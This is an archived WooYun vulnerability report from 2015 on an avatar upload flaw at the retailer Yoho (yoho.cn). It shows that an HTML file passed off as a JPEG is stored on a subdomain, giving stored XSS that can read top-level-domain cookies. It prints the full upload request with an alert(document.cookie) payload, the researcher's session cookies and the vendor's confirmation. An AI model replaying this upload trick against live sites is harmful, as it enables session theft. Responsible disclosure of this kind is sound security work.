乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-04: 细节已通知厂商并且等待厂商处理中 2015-09-05: 厂商已经确认,细节仅向厂商公开 2015-09-15: 细节向核心白帽子及相关领域专家公开 2015-09-25: 细节向普通白帽子公开 2015-10-05: 细节向实习白帽子公开 2015-10-20: 细节向公众公开
RT
头像上传可以上传任意文件 脚本不解析 但是可以获取到顶级域下的cookie,改成html可以造成一个xsshttp://www.yoho.cn/passport/personal/setting
POST / HTTP/1.1Host: upfile.yoho.cnContent-Length: 1009Origin: http://www.yoho.cnX-Requested-With: ShockwaveFlash/18.0.0.232User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Content-Type: multipart/form-data; boundary=----------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4Accept: */*Referer: http://www.yoho.cn/passport/personal/settingAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: _yasv=174023428; PHPSESSID=n7k7mn8is6rr60rbo5q09hl843; yh_merge_new=21691082%2C014afaca94534a8b8219b6d68d3c75931258fd3e%2Cy%2C1441331390; Hm_cv_cba6f2719081a006e181cf17fa40ad05=1*login*1; _gat=1; __utmt=1; Hm_lvt_cba6f2719081a006e181cf17fa40ad05=1441327478; Hm_lpvt_cba6f2719081a006e181cf17fa40ad05=1441341531; _ga=GA1.2.913168703.1441327478; __utma=79162396.913168703.1441327478.1441338275.1441341447.4; __utmb=79162396.5.10.1441341447; __utmc=79162396; __utmz=79162396.1441327539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=79162396.|1=login=1=1------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4Content-Disposition: form-data; name="Filename"xx.png------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4Content-Disposition: form-data; name="key"0aadYKdam_iAu-A1dxKCwgmvtg3_9khlYhAM_x7GVknQpoBCCo_nvbIhajkgd2LXFNUgBxUwQ94PmD74DtsvNW9Hg2AZyFIFNz17RPQBLjIH_PPJjUdggy9z0zz-60fmJGTnaktKB6PKw055tCdUgxLsmaJpx1tx3rnxerxtzrcSILEqi7Jv4i1PvTePmlIUXYouxPe7-m9DWxh9INAEx78W0xEqWAyV6zlcbmtccbh69HWBlnACN_LQIUx-dH0balJqznYxmR1THfls-3yyhg-m70KKWtrDod1GKN45beYvZQZvJcYvlsxt1JUAsZn0db7EjQBSlFBMfAiLcj6DDHtfhrPmY1aE0BEZaJy-uRgsIOIrk23tNPgyUaA------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4Content-Disposition: form-data; name="format"json------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4Content-Disposition: form-data; name="file"; filename="xx.html"Content-Type: image/jpeg<script>alert(document.cookie);</script>------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4Content-Disposition: form-data; name="Upload"Submit Query------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4--
http://img01.res.yoho.cn/headimg/2015/09/04/12/01f158383fe734394e384a1ebc25af5f36.html
你行
危害等级:中
漏洞Rank:10
确认时间:2015-09-05 10:39
感谢对我们的关注,我们马上处理
暂无